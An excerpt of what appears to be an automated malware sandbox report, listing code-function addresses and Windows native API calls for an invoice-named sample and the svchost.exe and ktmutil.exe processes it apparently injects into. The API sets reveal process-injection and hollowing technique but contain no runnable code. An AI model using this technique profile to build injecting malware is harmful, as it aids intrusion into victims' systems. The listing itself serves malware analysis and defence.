Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72DD0 NtDelayExecution,	1_2_03A72DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72D30 NtUnmapViewOfSection,	1_2_03A72D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72D00 NtSetInformationFile,	1_2_03A72D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72D10 NtMapViewOfSection,	1_2_03A72D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72CA0 NtQueryInformationToken,	1_2_03A72CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72CF0 NtOpenProcess,	1_2_03A72CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72CC0 NtQueryVirtualMemory,	1_2_03A72CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72C00 NtQueryInformationProcess,	1_2_03A72C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72C60 NtCreateKey,	1_2_03A72C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A73090 NtSetValueKey,	1_2_03A73090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A73010 NtOpenDirectoryObject,	1_2_03A73010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A739B0 NtGetContextThread,	1_2_03A739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A73D10 NtOpenProcessToken,	1_2_03A73D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A73D70 NtOpenThread,	1_2_03A73D70
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03304340 NtSetContextThread,LdrInitializeThunk,	5_2_03304340
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03304650 NtSuspendThread,LdrInitializeThunk,	5_2_03304650
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03302B60 NtClose,LdrInitializeThunk,	5_2_03302B60
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03302BA0 NtEnumerateValueKey,LdrInitializeThunk,	5_2_03302BA0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03302BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_03302BF0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03302BE0 NtQueryValueKey,LdrInitializeThunk,	5_2_03302BE0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03302AF0 NtWriteFile,LdrInitializeThunk,	5_2_03302AF0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03302AD0 NtReadFile,LdrInitializeThunk,	5_2_03302AD0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03302F30 NtCreateSection,LdrInitializeThunk,	5_2_03302F30
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03302FB0 NtResumeThread,LdrInitializeThunk,	5_2_03302FB0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03302FE0 NtCreateFile,LdrInitializeThunk,	5_2_03302FE0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03302E80 NtReadVirtualMemory,LdrInitializeThunk,	5_2_03302E80
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03302EE0 NtQueueApcThread,LdrInitializeThunk,	5_2_03302EE0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03302D30 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_03302D30
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03302D10 NtMapViewOfSection,LdrInitializeThunk,	5_2_03302D10
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03302DF0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_03302DF0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03302DD0 NtDelayExecution,LdrInitializeThunk,	5_2_03302DD0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03302C70 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_03302C70
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03302C60 NtCreateKey,LdrInitializeThunk,	5_2_03302C60
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03302CA0 NtQueryInformationToken,LdrInitializeThunk,	5_2_03302CA0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_033035C0 NtCreateMutant,LdrInitializeThunk,	5_2_033035C0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_033039B0 NtGetContextThread,LdrInitializeThunk,	5_2_033039B0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03302B80 NtQueryInformationFile,	5_2_03302B80
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03302AB0 NtWaitForSingleObject,	5_2_03302AB0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03302F60 NtCreateProcessEx,	5_2_03302F60
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03302FA0 NtQuerySection,	5_2_03302FA0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03302F90 NtProtectVirtualMemory,	5_2_03302F90
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03302E30 NtWriteVirtualMemory,	5_2_03302E30
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03302EA0 NtAdjustPrivilegesToken,	5_2_03302EA0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03302D00 NtSetInformationFile,	5_2_03302D00
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03302DB0 NtEnumerateKey,	5_2_03302DB0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03302C00 NtQueryInformationProcess,	5_2_03302C00
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03302CF0 NtOpenProcess,	5_2_03302CF0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03302CC0 NtQueryVirtualMemory,	5_2_03302CC0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03303010 NtOpenDirectoryObject,	5_2_03303010
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03303090 NtSetValueKey,	5_2_03303090
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03303D10 NtOpenProcessToken,	5_2_03303D10
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03303D70 NtOpenThread,	5_2_03303D70
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_02A39280 NtCreateFile,	5_2_02A39280
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_02A393F0 NtReadFile,	5_2_02A393F0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_02A39700 NtAllocateVirtualMemory,	5_2_02A39700
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_02A394F0 NtDeleteFile,	5_2_02A394F0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_02A395A0 NtClose,	5_2_02A395A0

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe

Code function: 0_2_00FA6685: CreateFileW,DeviceIoControl,CloseHandle,

0_2_00FA6685

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe

Code function: 0_2_00F9ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00F9ACC5

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe

Code function: 0_2_00FA79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_00FA79D3

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00F8B043	0_2_00F8B043
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00F73200	0_2_00F73200
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00F73B70	0_2_00F73B70
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00F9410F	0_2_00F9410F
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00F802A4	0_2_00F802A4
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00F6E3B0	0_2_00F6E3B0
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00F9038E	0_2_00F9038E
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00F806D9	0_2_00F806D9
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00F9467F	0_2_00F9467F
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00FCAACE	0_2_00FCAACE
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00F94BEF	0_2_00F94BEF
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00F8CCC1	0_2_00F8CCC1
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00F6AF50	0_2_00F6AF50
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00F66F07	0_2_00F66F07
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00FC31BC	0_2_00FC31BC
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00F8D1B9	0_2_00F8D1B9
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00F7B11F	0_2_00F7B11F
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00F9724D	0_2_00F9724D
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00F8123A	0_2_00F8123A
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00F693F0	0_2_00F693F0
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00FA13CA	0_2_00FA13CA
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00F7F563	0_2_00F7F563
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00F696C0	0_2_00F696C0
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00FAB6CC	0_2_00FAB6CC
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00FCF7FF	0_2_00FCF7FF
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00F677B0	0_2_00F677B0
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00F979C9	0_2_00F979C9
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00F7FA57	0_2_00F7FA57
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00F69B60	0_2_00F69B60
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00F67D19	0_2_00F67D19
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00F89ED0	0_2_00F89ED0
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00F7FE6F	0_2_00F7FE6F
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00F67FA3	0_2_00F67FA3
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_017DE260	0_2_017DE260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004188F3	1_2_004188F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00403060	1_2_00403060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004010C0	1_2_004010C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004101CA	1_2_004101CA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004101D3	1_2_004101D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00401200	1_2_00401200
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040235D	1_2_0040235D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402360	1_2_00402360
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00416B33	1_2_00416B33
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004103F3	1_2_004103F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402B95	1_2_00402B95
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402BA0	1_2_00402BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040E46B	1_2_0040E46B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040E473	1_2_0040E473
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0042EEA3	1_2_0042EEA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A4E3F0	1_2_03A4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B003E6	1_2_03B003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AFA352	1_2_03AFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AC02C0	1_2_03AC02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE0274	1_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AF41A2	1_2_03AF41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B001AA	1_2_03B001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AF81CC	1_2_03AF81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A30100	1_2_03A30100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADA118	1_2_03ADA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AC8158	1_2_03AC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AD2000	1_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3C7C0	1_2_03A3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40770	1_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A64750	1_2_03A64750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5C6E0	1_2_03A5C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B00591	1_2_03B00591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40535	1_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AEE4F6	1_2_03AEE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE4420	1_2_03AE4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AF2446	1_2_03AF2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AF6BD7	1_2_03AF6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AFAB40	1_2_03AFAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3EA80	1_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A429A0	1_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B0A9A6	1_2_03B0A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A56962	1_2_03A56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A268B8	1_2_03A268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6E8F0	1_2_03A6E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A4A840	1_2_03A4A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A42840	1_2_03A42840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ABEFA0	1_2_03ABEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A32FC8	1_2_03A32FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A82F28	1_2_03A82F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A60F30	1_2_03A60F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE2F30	1_2_03AE2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB4F40	1_2_03AB4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A52E90	1_2_03A52E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AFCE93	1_2_03AFCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AFEEDB	1_2_03AFEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AFEE26	1_2_03AFEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40E59	1_2_03A40E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A58DBF	1_2_03A58DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3ADE0	1_2_03A3ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A4AD00	1_2_03A4AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADCD1F	1_2_03ADCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE0CB5	1_2_03AE0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A30CF2	1_2_03A30CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40C00	1_2_03A40C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A8739A	1_2_03A8739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AF132D	1_2_03AF132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2D34C	1_2_03A2D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A452A0	1_2_03A452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE12ED	1_2_03AE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5D2F0	1_2_03A5D2F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5B2C0	1_2_03A5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A4B1B0	1_2_03A4B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A7516C	1_2_03A7516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2F172	1_2_03A2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B0B16B	1_2_03B0B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AF70E9	1_2_03AF70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AFF0E0	1_2_03AFF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AEF0CC	1_2_03AEF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A470C0	1_2_03A470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AFF7B0	1_2_03AFF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AF16CC	1_2_03AF16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A85630	1_2_03A85630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADD5B0	1_2_03ADD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B095C3	1_2_03B095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AF7571	1_2_03AF7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AFF43F	1_2_03AFF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A31460	1_2_03A31460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5FB80	1_2_03A5FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB5BF0	1_2_03AB5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A7DBF9	1_2_03A7DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AFFB76	1_2_03AFFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADDAAC	1_2_03ADDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A85AA0	1_2_03A85AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE1AA3	1_2_03AE1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AEDAC6	1_2_03AEDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB3A6C	1_2_03AB3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AFFA49	1_2_03AFFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AF7A46	1_2_03AF7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AD5910	1_2_03AD5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A49950	1_2_03A49950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5B950	1_2_03A5B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A438E0	1_2_03A438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAD800	1_2_03AAD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AFFFB1	1_2_03AFFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A41F92	1_2_03A41F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A03FD2	1_2_03A03FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A03FD5	1_2_03A03FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AFFF09	1_2_03AFFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A49EB0	1_2_03A49EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5FDC0	1_2_03A5FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AF7D73	1_2_03AF7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A43D40	1_2_03A43D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AF1D5A	1_2_03AF1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AFFCF2	1_2_03AFFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB9C32	1_2_03AB9C32
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	Code function: 3_2_0471DF1A	3_2_0471DF1A
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	Code function: 3_2_0471FCD1	3_2_0471FCD1
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	Code function: 3_2_0471FCC8	3_2_0471FCC8
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	Code function: 3_2_0473E9A1	3_2_0473E9A1
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	Code function: 3_2_04726631	3_2_04726631
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	Code function: 3_2_0471FEF1	3_2_0471FEF1
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	Code function: 3_2_0471DF69	3_2_0471DF69
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_0338A352	5_2_0338A352
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_032DE3F0	5_2_032DE3F0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_033903E6	5_2_033903E6
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03370274	5_2_03370274
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_033502C0	5_2_033502C0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_032C0100	5_2_032C0100
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_0336A118	5_2_0336A118
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03358158	5_2_03358158
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_033901AA	5_2_033901AA
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_033841A2	5_2_033841A2
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_033881CC	5_2_033881CC
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03362000	5_2_03362000
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_032D0770	5_2_032D0770
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_032F4750	5_2_032F4750
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_032CC7C0	5_2_032CC7C0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_032EC6E0	5_2_032EC6E0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_032D0535	5_2_032D0535
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03390591	5_2_03390591
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03374420	5_2_03374420
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03382446	5_2_03382446
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_0337E4F6	5_2_0337E4F6
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_0338AB40	5_2_0338AB40
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03386BD7	5_2_03386BD7
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_032CEA80	5_2_032CEA80
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_032E6962	5_2_032E6962
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_032D29A0	5_2_032D29A0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_0339A9A6	5_2_0339A9A6
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_032D2840	5_2_032D2840
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_032DA840	5_2_032DA840
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_032B68B8	5_2_032B68B8
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_032FE8F0	5_2_032FE8F0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03372F30	5_2_03372F30
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03312F28	5_2_03312F28
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_032F0F30	5_2_032F0F30
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_03344F40	5_2_03344F40
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_0334EFA0	5_2_0334EFA0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_032C2FC8	5_2_032C2FC8
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_0338EE26	5_2_0338EE26
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_032D0E59	5_2_032D0E59
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_0338CE93	5_2_0338CE93
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_032E2E90	5_2_032E2E90
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_0338EEDB	5_2_0338EEDB
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_0336CD1F	5_2_0336CD1F
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_032DAD00	5_2_032DAD00
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_032E8DBF	5_2_032E8DBF
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_032CADE0	5_2_032CADE0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_032D0C00	5_2_032D0C00
